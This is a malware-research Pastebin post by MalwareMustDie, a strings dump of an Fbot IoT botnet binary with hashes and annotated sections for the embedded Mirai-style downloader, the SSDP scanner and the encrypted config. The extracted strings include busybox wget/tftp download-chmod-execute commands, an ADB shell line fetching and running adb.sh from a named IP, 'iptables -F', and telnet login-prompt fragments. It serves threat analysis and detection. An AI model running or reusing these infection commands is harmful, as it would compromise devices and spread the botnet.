MalwareMustDie

The unpacked binary strings of recent Fbot binary

Feb 23rd, 2020
1,796
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. The unpacked binary strings of recent Fbot binary
  2. bot.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
  3.             statically linked, stripped
  4. MD5 (bot.x86_64) = ae975a5cdd9fb816a1e286e1a24d9144
  5. SHA1 (bot.x86_64) = a56595c303a1dd391c834f0a788f4cf1a9857c1e
  6. 31244 Feb 23 20:09 bot.x86_64*
  7.  
  8. Dumped by @unixfreaxjp with "strings" - MalwareMustDie, NPO - malwremustdie.org
  9.  
  10.  
  11. ---- strings start--------
  12. 9xsspnvgc8aj5pi7m28p
  13. x86_64
  14. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
  15. GET /bot.x86_64 HTTP/1.0
  16. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
  17. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  18. /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  19. shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
  20. \x%02x
  21. enable
  22. system
  23. linuxshell
  24. development
  25. iptables -F
  26. /bin/busybox FBOT
  27. /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
  28. /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
  29. /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
  30. arm5
  31. mips
  32. mipsel
  33. get: applet not found
  34. ftp: applet not found
  35. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
  36. cho: applet not found
  37. /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
  38. retrieve
  39. /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
  40. /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
  41. ./retrieve; ./.t telnet; >retrieve; >.t
  42. ECHODONE
  43. 9xsspnvgc8aj5pi7m28p
  44. /var/
  45. /dev/
  46. C H+C(L9
  47. []A\A]
  48. SHH9
  49. Z[]A\A]
  50. C8H9C(v
  51. 9xsspnvgc8aj5pi7m28p
  52. x86_64
  53. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
  54. GET /bot.x86_64 HTTP/1.0
  55. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
  56. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  57. /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  58. shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
  59. \x%02x
  60. enable
  61. system
  62. linuxshell
  63. development
  64. iptables -F
  65. /bin/busybox FBOT
  66. /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
  67. /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
  68. /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
  69. arm5
  70. mips
  71. mipsel
  72. get: applet not found
  73. ftp: applet not found
  74. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
  75. cho: applet not found
  76. /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
  77. retrieve
  78. /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
  79. /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
  80. ./retrieve; ./.t telnet; >retrieve; >.t
  81. ECHODONE
  82. 9xsspnvgc8aj5pi7m28p
  83. /var/
  84. /dev/
  85. /mnt/
  86. /var/run/
  87. /var/tmp/
  88. /dev/netslink/
  89. SHH9
  90. Z[]A\A]
  91. C8H9C(v
  92. 9xsspnvgc8aj5pi7m28p
  93. x86_64
  94. x86_64
  95. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
  96. GET /bot.x86_64 HTTP/1.0
  97. aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
  98. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  99. /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
  100. shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
  101. \x%02x
  102. enable
  103. system
  104. linuxshell
  105. development
  106. iptables -F
  107. /bin/busybox FBOT
  108. /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
  109. /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
  110. /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
  111. arm5
  112. mips
  113. mipsel
  114. get: applet not found
  115. ftp: applet not found
  116. /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
  117. cho: applet not found
  118. /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
  119. retrieve
  120. /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
  121. /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
  122. ./retrieve; ./.t telnet; >retrieve; >.t
  123. ECHODONE
  124. 9xsspnvgc8aj5pi7m28p
  125. /var/
  126. /dev/
  127. /mnt/
  128. /var/run/
  129. /var/tmp/
  130. /dev/netslink/
  131. /dev/shm/
  132. /bin/
  133. /etc/
  134. /boot/
  135. /usr/
  136. /sys/
  137. arm4
  138. arm6
  139. arm7
  140. nvalid
  141. ailed
  142. ncorrect
  143. enied
  144. rror
  145. oodbye
  146. ogin
  147. sername
  148. vrdvs
  149. ccount
  150. enter
  151. assword
  152. usybox
  153. ulti-call
  154. help
  155. CNXN
  156. host::features=cmd,shell_v2
  157. OPENX
  158. RPSW
  159. [^_]
  160. UWVS
  161. [^_]=
  162. ---------embedded downloader-part--------
  163. MIRAI
  164. GET /bot/bot.x86 HTTP/1.0
  165. .shstrtab
  166. .text
  167. .rodata
  168. .bss
  169.   !'
  170.  !'
  171. mips
  172. MIRAI
  173. GET /bot/bot.mips HTTP/1.0
  174. .shstrtab
  175. .text
  176. .rodata
  177. .got
  178. .bss
  179. .mdebug.abi32
  180. mipsel
  181. MIRAI
  182. GET /bot/bot.mipsel HTTP/1.0
  183. .shstrtab
  184. .text
  185. .rodata
  186. .got
  187. .bss
  188. .mdebug.abi32
  189. arm5
  190. MIRAI
  191. GET /bot/bot.arm5 HTTP/1.0
  192. aeabi
  193. .shstrtab
  194. .text
  195. .rodata
  196. .got
  197. .bss
  198. .ARM.attributes
  199. arm7
  200. MIRAI
  201. GET /bot/bot.arm7 HTTP/1.0
  202. aeabi
  203. .shstrtab
  204. .text
  205. .rodata
  206. .got
  207. .bss
  208. .ARM.attributes
  209. ---------end of embedded downloader-part--------
  210.  
  211. ---------SSDP-scanner-------
  212. Host:
  213. M-SEARCH * HTTP/1.1
  214. Host:239.255.255.250:1900
  215. ST:ssdp:all
  216. Man:"ssdp:discover"
  217. MX:3
  218. stats
  219. objectClass0
  220.         _services
  221. _dns-sd
  222. _udp
  223. local
  224. ----------end of SSDP------
  225.  
  226.  
  227.  
  228. abcdefghijklmnopqrstuvwxyz0123456789
  229. ------crypted-config------------
  230. vte1
  231. a~be1
  232. r^__TREX^_
  233. ZTTA
  234. P]XGT1
  235. AC^R
  236. BT]W
  237. TIT1
  238. AC^R
  239. ERA1
  240. AC^R
  241. RFU1
  242. UPEP
  243. ]^RP]
  244. dBTC
  245. pVT_E
  246. |^KX]]P
  247. |PRX_E^BY
  248. x_ET]
  249. pAA]TfTSzXE
  250. zye|}
  251. ]XZT
  252. vTRZ^
  253. rYC^\T
  254. bPWPCX
  255. |^KX]]P
  256. fX_U^FB
  257. pAA]TfTSzXE
  258. zye|}
  259. ]XZT
  260. vTRZ^
  261. rYC^\T
  262. bPWPCX
  263. |^KX]]P
  264. fX_U^FB
  265. pAA]TfTSzXE
  266. zye|}
  267. ]XZT
  268. vTRZ^
  269. rYC^\T
  270. bPWPCX
  271. |^KX]]P
  272. fX_U^FB
  273. fX_U^FB
  274. pAA]TfTSzXE
  275. zye|}
  276. ]XZT
  277. vTRZ^
  278. rYC^\T
  279. bPWPCX
  280. yeea
  281. --------- end of crypted config-----------------
  282. /dev/null
  283.  !#$$%%&&''(((())))****++++,,,,,,,,--------........////////
  284. __vdso_clock_gettime
  285. LINUX_2.6
  286.  !"#
  287. !"#
  288. -0X+0X 0X-0x+0x 0x
  289. -+   0X0x
  290. (null)
  291. 0123456789ABCDEF
  292. M(knN
  293. ---------GCC msgs------------
  294. Illegal byte sequence
  295. Domain error
  296. Result not representable
  297. Not a tty
  298. Permission denied
  299. Operation not permitted
  300. No such file or directory
  301. No such process
  302. File exists
  303. Value too large for data type
  304. No space left on device
  305. Out of memory
  306. Resource busy
  307. Interrupted system call
  308. Resource temporarily unavailable
  309. Invalid seek
  310. Cross-device link
  311. Read-only file system
  312. Directory not empty
  313. Connection reset by peer
  314. Operation timed out
  315. Connection refused
  316. Host is down
  317. Host is unreachable
  318. Address in use
  319. Broken pipe
  320. I/O error
  321. No such device or address
  322. Block device required
  323. No such device
  324. Not a directory
  325. Is a directory
  326. Text file busy
  327. Exec format error
  328. Invalid argument
  329. Argument list too long
  330. Symbolic link loop
  331. Filename too long
  332. Too many open files in system
  333. No file descriptors available
  334. Bad file descriptor
  335. No child process
  336. Bad address
  337. File too large
  338. Too many links
  339. No locks available
  340. Resource deadlock would occur
  341. State not recoverable
  342. Previous owner died
  343. Operation canceled
  344. Function not implemented
  345. No message of desired type
  346. Identifier removed
  347. Device not a stream
  348. No data available
  349.  
  350. ---------- end of strings---------
  351.  
  352. Research material of malwaremustdie.org, Feb 2020
  353. @unixfrexjp
RAW Paste Data